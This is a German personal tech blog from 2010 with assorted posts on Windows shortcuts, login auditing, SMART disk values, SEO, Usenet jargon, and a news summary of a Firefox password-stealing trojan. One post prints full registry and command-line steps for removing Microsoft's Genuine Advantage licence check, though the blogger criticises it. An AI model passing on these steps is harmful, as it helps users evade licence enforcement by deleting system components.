Samstag, 25. Dezember 2010

Illegale Anmelde-Versuche protokollieren

Da war doch jemand an meinem PC? Wenn Sie Änderungen an Ihrem Arbeitsplatz - PC oder Home PC wahrnehmen und feststellen möchten, wer sich am Rechner zu schaffen gemacht hat, dann gibt es einfache Tricks mit denen Sie das Anmeldeverhalten protokollieren können.
„Start" » „Einstellungen" » „Systemsteuerung" » „Verwaltung" » „Lokale Sicherheitseinstellungen" » „Anmeldeversuche überwachen" » „Fehlgeschlagen" etc


Das Video finden Sie in einer weitaus besseren Auflösung unter diesem Link:
http://www.franky4you.de/downloads/admin/

Externe Datenschutzbeauftragte und Datenschutzberater

Kleine und mittlere Unternehmen sehen sich mit rechtunsicherem Datenschutz konfrontiert. Stetig wachsende Bestimmungen zum Datenschutz und zur Datensicherheit, die gesetzliche Pflicht zur Bestellung eines Datenschutzbeauftragten und die Einhaltung zahlreicher formaler Regelungen und Festlegungen zum Schutz von personenbezogenen Daten Betroffener machen Outsourcing attraktiv.
Vorteil: Datenschutz leistet einen Beitrag bei der Gewinnung von Kundenvertrauen und kann damit einen Vorteil im Wettbewerb leisten.

Aufgabe: Datenschutzbeauftragte haben vorrangig die Datenverarbeitungsprogramme zu überwachen und das datenverarbeitende Personal mit dem Datenschutz vertraut zu machen.
Datenschutzbeauftragte müssen bestellt werden, wenn personenbezogene Daten (z. B. Arbeitnehmerdaten in der Personalabteilung, Kunden- und Interessentendaten) automatisiert verarbeitet werden:
  • in allen öffentlichen Stellen (beispielsweise Behörden) und
  • in nicht-öffentlichen Stellen (beispielsweise Unternehmen, Vereine, Rechtsanwaltskanzleien, Arztpraxen, Steuerkanzleien), wenn mindestens 10 Personen mit der Verarbeitung dieser Daten beschäftigt sind oder Zugriff auf diese Daten haben. Bei einer nicht automatisierten Datenverarbeitung greift die Vorschrift erst ab 20 Beschäftigten. Hierbei werden Teilzeitkräfte voll berücksichtigt. Unabhängig von der Mitarbeiterzahl muss ein Datenschutzbeauftragter bestellt werden, wenn die Organisation automatisierte Verarbeitungen durchführt, die einer so genannten Vorabkontrolle unterliegen, oder wenn sie personenbezogene Daten geschäftsmäßig verarbeitet, um diese an dritte Personen weiterzugeben (z. B. Adressdatenhandel).
Bei internen Datenschutzbeauftragten ist darauf zu achten, dass diese unabhängig und unter Meidung von Interessenkonflikten Ihren gesetzlichen Aufgaben nachkommen können. Externe Datenschutzbeauftragte müssen natürlich ebenfalls unabhängig ihrer Aufgabe nachkommen und dürfen auch keinen Interessenskonflikten unterliegen. Rechtsanwälte, die oft als externe Datenschutzbeauftragte beauftragt werden, sollten zur Wahrung der Unabhängigkeit daher nicht gleichzeitig zu allgemeinen Rechtsthemen beraten. Was sich in der hohen Anzahl von externen anbietenden Büros widerspiegelt!

Wer online werben will, braucht ehrliche Vergleichs - Zahlen!

IVW - Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern e.V.

Die Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern e. V. (Abk.: IVW) wird von den Medienunternehmen, den Werbungtreibenden sowie den Werbe- und Media-Agenturen in Deutschland unterhalten. Inhalt ihrer Tätigkeit ist das Sammeln valider Daten und deren Bereitstellung für die Leistungskontrolle von Werbeträgern (Vergleichsdaten).

Freitag, 26. November 2010

Anführungszeichen im internationalen Format setzen

Anführungszeichen sind Satzzeichen, die am Anfang und Ende der direkten Rede, eines wörtlichen Zitats oder des zitierten Titels oder Namens eines Werkes stehen. Im normalen Computergebrauch werden Anführungszeichen standardmäßig durch das "Zollzeichen" gesetzt. Wer es ausgefallen und semantisch richtig haben möchte oder auch haben muß, für den die das ein weiterer kleiner Ausflug in die HTML Sonderzeichen.

Sonntag, 31. Oktober 2010

Das Originale Twitter Gezwitscher in Homepagen einbinden

Ich fang so langsam an mich näher mit Twitter zu beschätigen. Neben den beliebten Vögelchen von denen mit der Google Bilder Suche jede Menge Variationen gefunden werden können, bietet auch Twitter selbst etliches um das Gezwittscher auf Twitter auf Webseiten und Blogs zu bringen, doch leider ist der nützliche Link recht umständlich zu erreichen.

Twitter / Resources

Donnerstag, 21. Oktober 2010

Coole Infos zur richtigen Nutzung von Keywords

Why do the first 250 words matter?

The first 250 words of web page copy are the most important. They tell both people and search engines what the page is about.
The top two to three keywords should appear about five times each in the first 250 words of web page copy, and two to three times each for every additional 250 words on the page.
Web copy should be written for human visitors first, and search engines second. Synonyms, plurals and correct tenses for keywords should be used as appropriate. Contrary to popular myth, search engines will notice these slight variations as instances of keywords.

Es sollten also die ersten 2-3 Schlüsselworte in den ersten 250 Worten ca. 5 x auftauchen und sollten sich in jeden weiteren 250 Worten noch ca. 3 x wiederholen.

Mittwoch, 20. Oktober 2010

Paradisoft RSS Popper

Ich suche gerade Anwendungen für RSS Feeds. Da der kostenlose Thunderbird hervorragend mit RSS Feeds klar kommt, machte ich mir wegen dem teuren Outlook keine Gedanken. Für alle die mit Outlook auskommen müssen, empfehle ich als Pimping for Outlook diesen Link!

Paradisoft RSS Popper

Dienstag, 19. Oktober 2010

Warnung vor Nebenverdienst-Angeboten im Internet

Warnung vor Nebenverdienst-Angeboten im Internet: 7,99 Euro für zwei Jahre "Click-&-pay"
"Paid4" heißt die Nebenverdienst-Szene, die sich "Päid for" ausspricht und übersetzt "bezahlt für" bedeutet. Zu der Szene zählen Surfer, die sich für ihre Aktivitäten im Netz bezahlen lassen – etwa, indem sie Internetseiten anklicken oder Werbebanner anschauen.
Doch bevor der Rubel rollt, ist stets eine Anmeldung bei den Betreibern der Dienste erforderlich. Und die machen oft erst mal selbst gute Nebengeschäfte: mit den Daten der Kunden. So sichern sich einige Internetportale bei der Anmeldung beispielsweise das Recht, Daten wie Name, Geburtsdatum, Handynummer und Hobbies für "Wettbewerbe, Werbe-SMS und andere Marketing Aktionen" weiterzugeben oder "an zahlende Werbekunden" zu verkaufen.

Einen absolut klasse recherchierten Beitrag finden Sie bei Computer Wissen
http://preview.tinyurl.com/33capv5

Helfen, ohne sich selbst in Gefahr zu bringen

Helfen, ohne sich selbst in Gefahr zu bringen - das ist der wichtigste Rat
der Polizei. Damit ein Helfer oder eine Helferin nicht selbst zum Opfer
wird, gilt es, die Situation richtig einzuschätzen und immer auch die
eigene Sicherheit im Blick zu haben. Für den Ernstfall hat die Polizei
deswegen sechs Regeln für richtiges Verhalten entwickelt. Diese finden sich
auf einem Info-Kärtchen, das in jeden Geldbeutel passt, und im Ernstfall
eine große Hilfe sein kann.

Die sechs Regeln:
  1. Ich helfe, ohne mich selbst in Gefahr zu bringen.
  2. Ich fordere andere aktiv und direkt zur Mithilfe auf.
  3. Ich beobachte genau, präge mir Täter-Merkmale ein.
  4. Ich organisiere Hilfe unter Notruf 110.
  5. Ich kümmere mich um Opfer.
  6. Ich stelle mich als Zeuge zur Verfügung.

Das Info-Kärtchen und weitere Medien der Aktion-tu-was sind bei Ihrer
nächstgelegenen (Kriminal-)Polizeilichen Beratungsstelle erhältlich und als
Download eingestellt unter:
http://www.aktion-tu-was.de/service/mehr-zivilcourage

Tja das war wohl NIX!

Mit von Nutzern definierten Suchmaschinen läßt sich einiges anstellen und im Augenblick bietet anscheinend nur Google dieses Feature an. Wir fanden zwar bei Mojeek eine weitere Möglichkeit, die wir auch nutzen wollten, doch damit wars dann auch schon, also an alle die auf unsere weiteren von Nutzer definierten Suchmaschinen warteten: Sorry das wird NIX!


Hi Frank,

Thanks for your interest in Mojeek personal search, although unfortunately we have decided to disable the feature whilst we finalise a major upgrade to the system in the next few weeks/month. After that time we're not sure whether the personal search will return or not, or if it does in what format.

Sorry I couldn't be more help at present.

Regards,
Marc


Die entsprechenden Hinweise auf den WebSeiten werden wir sukzessive wieder rausnehmen!

Montag, 18. Oktober 2010

Den Blog unter die Leute bringen

Wenn Sie mit 5 Minuten Arbeit im Internet reich werden wollen, dann muß Ihr Blog natürlich auch bekannt sein, damit die Völkerwanderschaft von Besuchern bei Ihrem Blog vorbeikommt, sofern Sie nicht genügend Besucher gegen Bezahlung beim Blog vorbeischleifen wollen.Für alle die auf die Selbstreinigungskraft des Internets vertrauen, haben wir eine Liste mit WebSites erstellt, die Ihnen bei der Verbesserung des Bekanntheitsgrads Ihres Blogs nützlich sein können:

Freitag, 15. Oktober 2010

Malware als Passwortdieb: Schadsoftware konfiguriert Browser Firefox um - Magnus.de

Malware als Passwortdieb: Schadsoftware konfiguriert Browser Firefox um - Magnus.de:
"Passwortdieb - Malware konfiguriert Firefox um"

Ein Schädling manipuliert eine Konfigurationsdatei von Firefox, um Passwörter ausspionieren zu können. Er konfiguriert den Browser so, dass dieser ohne Rückfrage beim Benutzer alle Passwörter speichert, die für Anmeldungen im Web eingegeben werden.

Im Webbroot Threat Blog berichtet Andrew Brandt über ein Trojanisches Pferd namens 'Trojan-PWS-Nslog', das auch aktuelle Firefox-Versionen manipulieren kann. Standardmäßig fragt Firefox nach Eingabe eines Passworts auf einer Website, ob der Benutzer das Passwort speichern möchte. Anwender können das Speichern von Passwörtern ganz abschalten, eine Möglichkeit Passwörter ohne.....

Verfügbare Tastenkombinationen in Windows XP

Allgemeine Tastenkombinationen

[STRG]+[C] Kopieren
[STRG]+[X] Ausschneiden
[STRG]+[V] Einfügen
[STRG]+[Z] Rückgängig
[ENTF] Löschen
[UMSCHALT]+[ENTF] Markiertes Element dauerhaft entfernen, ohne es in den Papierkorb zu verschieben
[STRG] beim Ziehen eines Elements Markiertes Element kopieren
[STRG]+[UMSCHALT] beim Ziehen eines Elements Verknüpfung zum markierten Element erstellen
[F2] Markiertes Element umbenennen
[STRG]+[NACH-RECHTS-TASTE] Einfügemarke an den Anfang des nächsten Wortes stellen
[STRG]+[NACH-LINKS-TASTE] Einfügemarke an den Anfang des vorigen Wortes stellen
[STRG]+[NACH-UNTEN-TASTE] Einfügemarke an den Anfang des nächsten Absatzes stellen
[STRG]+[NACH-OBEN-TASTE] Einfügemarke an den Anfang des vorigen Absatzes stellen
[STRG]+[UMSCHALT] mit einer beliebigen Pfeiltaste Textblock markieren
[UMSCHALT] mit einer beliebigen Pfeiltaste Mehrere Elemente in einem Fenster oder auf dem Desktop markieren oder Text in einem Dokument markieren
[STRG]+[A] Alles markieren
[F3] Datei oder Ordner suchen
[ALT]+[EINGABE] Eigenschaften des markierten Elements anzeigen
[ALT]+[F4] Aktives Element schließen oder aktives Programm beenden
[ALT]+[EINGABE] Eigenschaften des markierten Objekts anzeigen
[ALT]+[LEERTASTE] Kontextmenü für aktives Fenster öffnen
[STRG]+[F4] In Programmen, die das gleichzeitige öffnen mehrerer Dokumente zulassen: Aktives Dokument schließen
[ALT]+[TAB] Zwischen geöffneten Elementen wechseln
[ALT]+[ESC] Elemente in der Reihenfolge durchlaufen, in der sie geöffnet wurden
[F6] Bildschirmelemente in einem Fenster oder auf dem Desktop durchlaufen
[F4] Adressleistenliste in "Arbeitsplatz" oder im Windows Explorer anzeigen
[UMSCHALT]+[F10] Kontextmenü für markiertes Element anzeigen
[ALT]+[LEERTASTE] Systemmenü für aktives Fenster anzeigen
[STRG]+[ESC] Startmenü anzeigen
[ALT]+Unterstrichener Buchstabe in einem Menünamen Entsprechendes Menü anzeigen
Unterstrichener Buchstabe in einem Befehlsnamen oder in einem geöffneten Menü Entsprechenden Befehl ausführen
[F10] Menüleiste im aktiven Programm aktivieren
[NACH-RECHTS-TASTE] Nächstes Menü nach rechts oder Untermenü öffnen
[NACH-LINKS-TASTE] Nächstes Menü nach links öffnen oder Untermenü schließen
[F5] Aktives Fenster aktualisieren
[RüCKTASTE] übergeordneten Ordner in "Arbeitsplatz" oder im Windows Explorer anzeigen
[ESC] Aktuellen Vorgang abbrechen
[UMSCHALT] beim Einlegen einer CD-ROM in das CD-ROM-Laufwerk Automatisches Abspielen der CD-ROM verhindern

Tastenkombinationen für Dialogfelder

[STRG]+[TAB] Vorwärts durch die Registerkarten navigieren
[STRG]+[UMSCHALT]+[TAB] Rückwärts durch die Registerkarten navigieren
[TAB] Vorwärts durch die Optionen navigieren
[UMSCHALT]+[TAB] Rückwärts durch die Optionen navigieren
[ALT]+Unterstrichener Buchstabe Entsprechenden Befehl ausführen oder entsprechende Option auswählen
[EINGABE] Befehl für aktive Option oder Schaltfläche ausführen
[LEERTASTE] Kontrollkästchen aktivieren oder deaktivieren, wenn die aktive Option ein Kontrollkästchen ist
Pfeiltasten Schaltfläche auswählen, wenn die aktive Option eine Gruppe von Optionsschaltflächen ist
[F1] Hilfe anzeigen
[F4] Elemente in der aktiven Liste anzeigen
[RüCKTASTE] übergeordneten Ordner anzeigen, wenn ein Ordner im Dialogfeld Speichern unter oder öffnen markiert ist

Tastenkombinationen für den Windows Explorer

[ENDE] Ende des aktiven Fensters anzeigen
[POS1] Anfangs des aktiven Fensters anzeigen
[NUM]+Stern (*) Alle Unterordner zum markierten Ordner anzeigen
[NUM]+Pluszeichen (+) Inhalt des markierten Ordners anzeigen
[NUM]+Minuszeichen (-) Markierten Ordner reduzieren
[NACH-LINKS-TASTE] Aktuelle Auswahl reduzieren, sofern sie erweitert ist, oder übergeordneten Ordner markieren
[NACH-RECHTS-TASTE] Aktuelle Auswahl erweitern, sofern sie reduziert ist, oder ersten Unterordner markieren

Navigation im Microsoft Internet Explorer

[STRG]+[B] Dialogfeld Favoriten verwalten öffnen
[STRG]+[E] Suchleiste öffnen
[STRG]+[F] Dienstprogramm "Suchen" starten
[STRG]+[H] Leiste "Verlauf" öffnen
[STRG]+[I] Leiste "Favoriten" öffnen
[STRG]+[L] Dialogfenster öffnen öffnen
[STRG]+[N] Weitere Browserinstanz mit derselben Webadresse öffnen
[STRG]+[O] Dialogfenster öffnen öffnen, wie bei [STRG]+[L]
[STRG]+[P] Dialogfenster Drucken öffnen
[STRG]+[R] Aktuelle Webseite aktualisieren
[STRG]+[W] Aktuelles Fenster schließen


Navigation mit Windows Taste

  • Windows + M minimiert alle Fenster, die einen Button in der Taskleiste haben und zeigt den Desktop; Fenster ohne Taskleisten-Button werden so zugänglich.
  • Windows + Shift + M stellt alle zuvor minimierten Fenster wieder her.
  • Windows + D minimiert die komplette Fensterlandschaft zum Desktop und zurück.
  • Windows + E öffnet ein Fenster des Windows-Explorers.
  • Windows + F öffnet die Suchfunktion.
  • Windows + R öffnet das Fenster Ausführen.
  • Windows + L sperrt den Rechner (Anwendungen laufen weiter, zum erneuten Zugriff ist die Eingabe des Kennwortes erforderlich).
  • Windows + Pause öffnet das Fenster „Systemeigenschaften“.
  • Windows + U erlaubt jederzeit Zugriff auf die Eingabehilfen.

 

Freitag, 8. Oktober 2010

Benutzer Definierter Player für YouTube

Nachdem ich mir gerade mal wieder einen Wolf gesucht habe um einen Benutzer definierten Player zu erstellen, weil die Hilfe andauernd auf Links bei der YouTube - Konto Administrierung hinwies, die aber leider nicht in unserer Oberfläche zu finden waren, poste ich hier mal den Link:

http://www.youtube.com/custom_player

Mit dem benutzer definierten Player lassen sich YouTube Playlisten in einen schickeren Player einbetten und auch besser auf einer Homepage anbieten.

Jetzt fehlt mir blos noch der Link mit der ich zur Übersicht meiner bisherigen YouTube Player komme.
Kennt den jemand?
Und da habe ich den Link doch auch schon!
Denn wer unten auf den Abbrechen Button klickt, der wird auf die Seite:

http://www.youtube.com/my_players

geleitet. Und diese Seite hat die wunderbare Überschrift!

Benutzerdefinierte Videoplayer

Erstelle benutzerdefinierte Videoplayer für die Veröffentlichung auf Websites oder in Blogs. Du kannst die Farben und Inhalte eines Players jederzeit ändern. Der Player wird dann automatisch mit den neuen Einstellungen aktualisiert.

Freitag, 1. Oktober 2010

META Angaben bei Blogger ändern

Ich habe versucht die META Tags des Blogs in Blogger.com zu verändern, aber da war leider nicht viel möglich. Die schlauste Lösung stellt meiner Meinung dieses Codesnippet dar.


Damit wird für die Eingangsseite des Blogs eine Beschreibung und Schlüsselworte an die SEO übermittelt. Für die übrigen Blogseiten werden zumindest die Schlüsselwörter eingetragen. Die Beschreibung entfällt für die übrigen Seiten.
Blogger läßt nur eine umständlich auszuführende Abfrage in den Metaangaben des Blogs zu, die zudem nach jedem neuen Blogartikel wieder abgeändert werden müßte. Diese Lösung ist mir absolut zu umständlich, da macht das schnelle Blogen einfach keinen Sinn mehr!
Da nimm ich lieber dann die mittelmäßige SEO Freundlichkeit in Kauf!

Dienstag, 28. September 2010

Wir ziehen um auf neue Server!

Wir ziehen mit unseren Domains auf neue Server um. Nachdem wir fast schon Jahrzehnte lang unsere Homepagen auf Strato hosteten, bekamen wir von WebGo24 ein Angebot, daß wir nicht abschlagen konnten. Nach der ersten Testphase beschloßen wir den kompletten Umzug.

Die Erfahrungen, die wir bei dem Umzug sammeln dürfen, werden wir Euch noch in den passenden Kategorien mitteilen, aber im Augenblick sind

* eMail Server konfigurieren
* eMail Klients konfigurieren
* Passwort geschützte Bereiche einrichten
* Datenbanken exportieren
* Datenbanken importieren
* Domains ummelden
* Subdomains einrichten
* Server in den Anwendungen konfigurieren
* .....

und jede Menge anderer Dinge angesagt. Dementsprechend wird es in den nächsten Wochen und Monaten wohl weniger mit neuen Features und alt gewohntes dürfte ab und an holprig sein.
Trotzdem: Wir bemühen uns natürlich die Einschränkungen so gering, wie möglich zu halten!

Freitag, 24. September 2010

Tastenkombination in den Internet - Browsern

Tastenkombination im Firefox-Browser

Zum blitzschnellen Blättern durch die Tabs eine praktische Sache..
[Strg][T] - eine neue Registerkarte öffnen
[Strg][Bild rauf] - zur Registerkarte links vom aktuellen Tab springen
[Strg][Bild runter] - zur Registerkarte links vom aktuellen Tab springen

Tastenkombination für den Internet Explorer von Microsoft
F4     In die Adresszeile springen
F5     Seite aktualisieren
F11   Vollbild
Alt     Menüleiste temporär einblenden
Alt-Links      Vorherige Seite
Alt-M           Homepage aufrufen
Alt-Rechts     Nächste Seite
Alt-Return     Eingegebene URL in neuer Registerkarte/Tab öffnen
Esc Ladevorgang der aktuellen Seite abbrechen
Strg-”+” Web-Seite vergrößern
Strg-”-”  Web-Seite verkleinern
Strg-D     Aktuelle Seite zu Favoriten hinzufügen
Strg-E      In die Suchleiste springen
Strg-F      Aktuelle Seite durchsuchen
Strg-H     Verlauf aufrufen
Strg-I       Favoriten aufrufen
Strg-J       RSS-Feeds aufrufen
Strg-N      Neues Fenster öffnen
Strg-P       Drucken
Strg-Q      Miniaturansichten aller Registerkarten/Tabs
Strg-R      Neue Registerkarte/Tab öffnen
Strg-Tab   Zwischen Registerkarten/Tabs wechseln
Strg-W     Aktuelle Registerkarte/Tab schließen

Windows Genuine Advantage entfernen

Ich habe vor kurzem auf einer renommierten Webseite folgende Anleitung gefunden um das WGUI Tool von Microsoft zu deinstallieren. Der Trick funktioniert natürlich, allerdings nur temporär, denn es wird bei jedem größeren Windows Update diese Prozedur von Neuem notwendig. Was soll denn bitte der Geiz? Für weit unter 30.- Euro wird bereits ein voll zu lizensierendes und zu aktivierendes Windows XP Professional in Deutsch incl. Service Pack2 mit einem freundlichen Lächeln für die Kundschaft über den Ladentisch geschoben.
Diese Prozedur ist übrigens nicht der neueste in diesem Metier. Er wurde eigentlich bereits vor etlichen Jahren in den Anfängen des Windows XP zum Thema WGUI  auf vielen Plattformen diskutiert!
Hat also bereits eher geschichtlichen Charakter!

Um zum Beispiel bei Windows XP das Tool Windows Genuine Advantage zu entfernen, ist ein wenig Handarbeit angesagt. Mit folgenden Schritten werden Sie das Genuine-Advantage-Tool wieder los:
1. Öffnen Sie den Registry-Editor, indem Sie die Tastenkombination [Windows-Taste][R] drücken und den Befehl “regedit” eingeben.
2. Im Registrierungseditor wechseln Sie in folgenden Ordner:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
Hier markieren Sie den Unterschlüssel “WGALogon” und löschen ihn mit der [Entf]-Taste. Bestätigen Sie die Sicherheitsabfrage mit “Ja”.
3. Dann starten Sie den Windows-Explorer und wechseln in den Ordner “C:\Windows\System32″. Benennen Sie die dort gespeicherte Datei “wgalogon.dll” und “wgatray.exe” um, indem Sie ans Ende den Zusatz “.alt” hängen. Die Dateinamen lauten dann zum Beispiel folgendemaßen:
wgalogon.dll.alt
wgatray.exe.alt
4. Starten Sie den Rechner neu. Öffnen Sie das Fenster der Eingabeaufforderung, indem Sie die Tastenkombination [Windows-Taste][R] drücken und den Befehl “cmd” eingeben. Danach geben Sie folgende Zeile ein und bestätigen sie mit der [Return]-Taste:
Regsvr32 %Windir%\system32\LegitCheckControl.dll /u
5. Starten Sie den Rechner ein weiteres Mal neu. Öffnen Sie erneut die Eingabeaufforderung, und geben Sie nacheinander die folgenden Zeilen ein (die Sie jeweils mit der [Return]-Taste bestätigen):
del %Windir%\system32\wgalogon.dll.alt
del %Windir%\system32\WgaTray.exe.alt
del %Windir%\system32\LegitCheckControl.dll
6. Öffnen Sie erneut den Registrierungseditor, und wechseln Sie in den folgenden Ordner:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
Hier löschen Sie den erneut angelegten Unterordner “WGALogon”. Danach wechseln Sie in den Ordner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
und entfernen hier den Unterordner “WGA”. Damit ist das Windows Genuine Advantage Tool vom Rechner verschwunden.

Auf gut Deutsch gesagt, also echter Schwachsinn! Nicht nur, daß jeder, der vor über 3400 Tagen dieses Tutorial las, welches heute sogar in Computerzeitschriften zu finden ist, las, zum Staatsfeind avancierte, NEE bei jedem automatisiertem Update wurde dieser komplizierte HAck von neuem notwendig oder XP rotzte einfach ab!
Leute spendet weniger Euren Parteien und kauft Euch endlich ne LIZENZ!

SMART Werte - Self-Monitoring, Analysis and Reporting Technology

Das Self-Monitoring, Analysis and Reporting Technology (SMART bzw. S.M.A.R.T.), zu deutsch System zur Selbstüberwachung, Analyse und Statusmeldung, ist ein Industriestandard, der in Computerfestplatten  eingebaut wird. Es ermöglicht das permanente Überwachen wichtiger Parameter und somit das frühzeitige Erkennen drohender Defekte.

Parametername Bedeutung
Raw Read Error Rate Kritisch. Ein niedriger Wert weist auf unkorrigierbare Lesefehler hin, die mit der Plattenoberfläche oder mit den Leseköpfen zusammen hängen.
Througput Performance Kritisch. Allgemeiner Indikator für den Datendurchsatz. Niedrige Werte zeigen, dass die Platte nicht mehrin vollem Tempo arbeiten kann.
Spin Up Time Mittlere Startzeit des Motors, der die Platten antreibt. Schlechte Werte können auf Lagerprobleme hinweisen, die oft von zu hohen Temperaturen kommen.
Start/Stop Count Unkritisch. Zählt die Start/Stop-Vorgänge des Laufwerks.
Reallocated Sector Count Sehr kritisch. Zählt, wieviele Reservesektoren die Festplatte bereits genutzt hat. Deutet auf Medienprobleme hin.
Read Channel Margin Gibt an, wie viel der Bandbreite bei Lesevorgängen im Mittel genutzt wird. Die genaue Bedeutung ist undokumentiert.
Seek Error Rate Kritisch. Zählt die Fehler bei Lesevorgängen, die vom Zustand des Positionierungssystems, oder von der Oberfläche abhängig sind.
Seek Time Performance Allgemeiner Wert, der die Leistung der Leseköpfe beschreibt. Niedrige Werte weisen auf Mechanische Probleme hin.
Power On Hours Count Zählt die Betriebsstunden der Platte. Meist in einem herstellerspezifischen Format.
Spin Retry Count Kritisch. Gibt an, wie oft der Motor anlaufen musste, damit die Platte ihre betriebstypische Umdrehungszahl erreich.
Recalibration Retries Kritisch. Zählt, wie oft die Platte die Schreib-Leseköpfe neu kalibrieren musste. Weißt auf mechanische Fehlfunktionen hin.
Device Power Cycle Count Zeigt die Statistik, wie oft das Laufwerk ein- und ausgeschaltet wurde.
Soft Read Error Rate Gibt an, wie oft das Betriebssystem die gelesenen Daten als fehlerhaft verworfen hat
G-Sense Error Rate G-Sense steht für einen Schock-Sensor, der heftige Erschütterungen im Betrieb misst
Power-Off Retract Cycle Zählt lediglich, wie oft die Festplatte abgeschaltet wurde
Load/Unload Cycle Count Gibt an, wie oft die Platte ihre Schreib- und Leseköpfe in die Parkposition (Landing Zone) gefahren hat.
Temperature Gibt die Temperatur des Laufwerks an. Eher unwichtig, da die Messung bei den meisten Geräten sehr ungenau ist.
Reallocation Events Count Sehr kritisch. Zählt jeden Versuch der Platte, Sektoren umzumappen, auch wenn dies nicht gelingt.
Current Pending Sector Count Sehr kritisch. Gibt die Anzahl der instabilen Sektoren an, die auf eine Verschiebung in den reservierten Bereich warten.
Uncorrectable Sector Count Sehr kritisch. Die Anzahl der fehlerhaften Sektoren, welche die interne Plattenlogik nicht restaurieren und in den reservierten Bereich verschieben kann
UltraDMA CRC Error Rate Kritisch. Anzahl der Prüfsummenfehler bei der Datenübertragung. Kann auch auf defekte Kabel, Treiberkonflikte oder auf Übertaktungsprobleme hinweisen
Write Error Rate Kritisch. Zählt, wie oft Fehler beim Schreiben von Sektoren aufgetreten sind.
Disk Shift Sehr Kritisch. Dieser Wert gibt an, ob sich aufgrund von Temperaturproblemen oder Schockeinwirkungen eine Umwucht gebildet hat.
Loaded Hours Gibt an, wie lange die Platte unter Volllast stand. Der Indikator dafür sind die Bewegungen des Plattenarms.
Load/Unload Retry Count Zählt in einer undokumentierten Einheit, wie oft die Schreib-Leseköpfe die Position geändert haben
Load Friction Zeigt einen statistischen Wert, wie hoch der Reibungswiederstand beim Bewegen des Plattenarmes ist
Load-in Time Gibt an, wie lange sich der Plattenarm nicht in der Landing Zone geparkt war.
Torque Amplification Count Zählt, wie oft die interne Logik der Platte das Drehmoment neu anpassen musste
GMR Head Amplitude Ein rein statistischen Wert über die zurückgelegte Distanz der Schreib-Leseköpfe während einer Bewegung.

Passende Programme zum Auslesen der SMART Werte:

Open Directory Project (ODP)

Um eine WebSite beim größten, am meisten verbreiteten und genutzten Webkatalog der Welt erfolgreich und schnell anmelden zu können, sollten Sie bestimmte Aufgaben schon vor Ihrem Antrag auf  DMOz.org erledigen.
  • Warten Sie mit der Anmeldung bis zur vollständigen Fertigstellung
  • Überprüfen Sie vor der Anmeldung, ob Ihre Seite bereits aufgenommen ist
  • Wählen Sie die passende Kategorie aus
  • Erstellen Sie einen passenden Titel
  • Formulieren Sie Sie eine gute Beschreibung
  • Geben Sie Ihre Hauptdomain an
  • Melden Sie Ihre Seite nur einmal an
  • Speichern Sie alle Ihre Angaben
  • Nutzen Sie die 'Eintrag aktualisieren' Funktion
Wenn Sie das  Open Directory Project (ODP) in Ihre WebSite als eigenen WebKatalog einbinden möchten, dann empfehlen wir Ihnen das kostenlose PHP Script DWodp von Dominion Web

Online genutzte Abkürzungen

Die folgenden Abkürzungen beziehen sich eigentlich auf das Usenet, haben sich aber in der Zwischenzeit auf sämtlichen Online Plattformen und in den sozialen Netzwerken eingebürgert.
Das Usenet (urspr. Unix User Network – engl. „Netzwerk für die Benutzer von Unix“) ist ein weltweites, elektronisches Netzwerk, das Diskussionsforen (so genannte „Newsgroups“) aller Art bereitstellt und an dem grundsätzlich jeder teilnehmen kann. 

ACK - Acknowledge – Zustimmung. Gegenteil: NACK.
AFAIK – As far as I know – Soweit ich weiß
AFAIR – As far as I remember – Soweit ich mich erinnere
AFAI(C)S – As far as I (can) see – Soweit ich die Sache überblicke(n kann)
aka - also known as ... – auch bekannt als ...
AOL - „Finde ich auch“.
Artikel, Posting - Einzelner Beitrag in einer Gruppe. Das Abschickens eines Artikels nennt man „posten“.
BOFH - Bastard Operator From Hell
BTDT - Been there, done that – „ich war da und hab’s selbst probiert“ GTLT got that lousy T-shirt – „und hab dieses blöde T-Shirt bekommen“.
BTW - By The Way – Übrigens...
Cancel, canceln - Löschen eines Artikels. 
CMIIW - Correct me if I’m wrong – „Korrigiert mich, wenn ich falsch liege“.
Crossposting - X-Posting  xpost - Wenn man einen Artikel in mehrere Gruppen senden will
DAU - Dümmster Anzunehmender User
/dev/null - Untschüss.
EOD - End of discussion – „damit ist das Thema für mich erledigt, ich werde mich nicht mehr dazu äußern.“
EOT - End of thread/topic - Vorschlag, eine (fruchtlose) Diskussion komplett zu beenden.
FAQ - (gesprochen entweder „Eff-Ah-Kuh“ oder, wenn du dich traust, „fack“)
Frequently Asked Questions,  „Fragen, die immer wieder gestellt werden“
Flame - persönlich verletzender Artikel
Flamewar - Artikel der alle Mitleser einfach nur genervt.
Follow-Up - Abkürzung: „F'up“. Artikel, der auf einen anderen Artikel Bezug nimmt.
Followup-To - Abkürzung: „F'up2“ - Angabe im Header, wohin Follow-Ups geschickt werden.
FRZ - Fragezeichen
„fuppen“ - Verb zu „F’up2“. Umleiten einer Diskussion
GABELN - Gruppe Area Brett Echo Liste Newsgroup.
Gruppe, Newsgroup, Forum - „Schwarzes Brett“ im Usenet, an dem sich die Artikel befinden.
^H - aus Versehen etwas falsches gesagt
^W -  aus Versehen etwas falsches gesagt
Header - „Briefkopf“ eines Artikels
HTH - Hope that helps – „Ich hoffe, deine Frage ist damit zumindest so weit beantwortet, dass du erst einmal weiter kommst...“
IANAL -  I am not a lawyer – „Ich bin kein Jurist“ - „Disclaimer“
IBTD - I beg to differ – „Bei allem Respekt, ich bin anderer Meinung“.
IIRC - If I remember/recall correctly – „Wenn ich mich recht erinnere...“
IM(H)O - In my (humble) opinion – „Meiner (bescheidenen) Meinung nach...“
die ~ machen - Ein Followup auf einen eigenen Artikel schreiben
IOW - In other words – „Mit anderen Worten...“
IRL - In Real Life – „im wirklichen Leben“
Jehova - Rotes Tuch - „JHVH“. Strenggläubigen Juden ist es verboten, diesen Namen in den Mund zu nehmen. 
JFTR - Just for the record – „nur fürs Archiv“ - „nur zur Kenntnis“.
Killfile - Filterliste
LART - Luser Attitude Readjustment Tool –  „Werkzeug zum Neuabgleich der Einstellung des Lusers“
LOL - Laugh out loud – Lautes Lachen.
